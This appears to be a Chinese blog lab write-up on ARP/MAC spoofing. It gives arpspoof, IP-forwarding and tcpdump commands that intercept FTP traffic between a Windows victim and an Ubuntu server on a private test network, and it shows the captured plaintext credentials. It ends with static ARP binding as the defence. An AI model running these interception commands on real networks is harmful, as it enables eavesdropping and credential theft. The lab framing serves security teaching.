Mac欺骗实验

0x01 实验准备

实验拓扑图:

实验拓扑图

实验工具:
  1. arpspoof
    命令:arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host
  2. tcpdump
  3. wireshark
实验环境:
  1. 准备三台设备,分别是靶机(Windows)、攻击机(kali)和FTP服务器(Ubuntu),并处于互能ping通状态。

  2. Ubuntu安装 FTP:apt install vsftpd,并配置ftp文件(vi /etc/vsftpd.conf)
    编辑vsftpd.conf文件

  3. 在/etc/allowed_users文件下添加允许连接FTP的用户

0x02 实验步骤

1. 攻击机开启转发功能
#echo 1 > /proc/sys/net/ipv4/ip_forward

开启转发功能

2. 攻击机使用 arpspoof工具实现双向欺骗

arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host

#arpspoof -i eth0 -t 192.168.233.128 192.168.233.168
#arpspoof -i eth0 -t 192.168.233.168 192.168.233.128

使用 arpspoof工具实现双向欺骗

3. 攻击机使用tcpdump工具监听ftp端口(21端口)或者使用Wireshark监听ftp流量
#tcpdump -i eth0 -X tcp port 21

tcpdump工具监听21端口:
在这里插入图片描述

Wireshark工具监听并筛选ftp:
在这里插入图片描述

4. 分别查看靶机和FTP服务器的Mac地址
#arp -a

靶机上的Mac地址:
在这里插入图片描述

FTP服务器上的Mac地址:
在这里插入图片描述

5. 使用Windows(靶机)连接FTP服务器进行
>ftp 192.168.233.168

在这里插入图片描述

6. 查看攻击机抓取的数据包,发现靶机使用的FTP账号及密码

tcpdump抓到的数据包:
在这里插入图片描述
在这里插入图片描述

Wireshark抓到的数据包:
在这里插入图片描述

0x03 结果

FTP服务器
用户名:ftpuser
密码:ftpuser

0x04 防御

设置ip-mac双向绑定(将mac地址设置为静态)

  1. Windows绑定IP:arp -s IP Mac地址(arp -s 157.55.85.212 00-aa-00-62-c6-09)
  2. Linux绑定IP:arp -s IP Mac地址(arp -s 157.55.85.212 00:aa:00:62:c6:09)
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值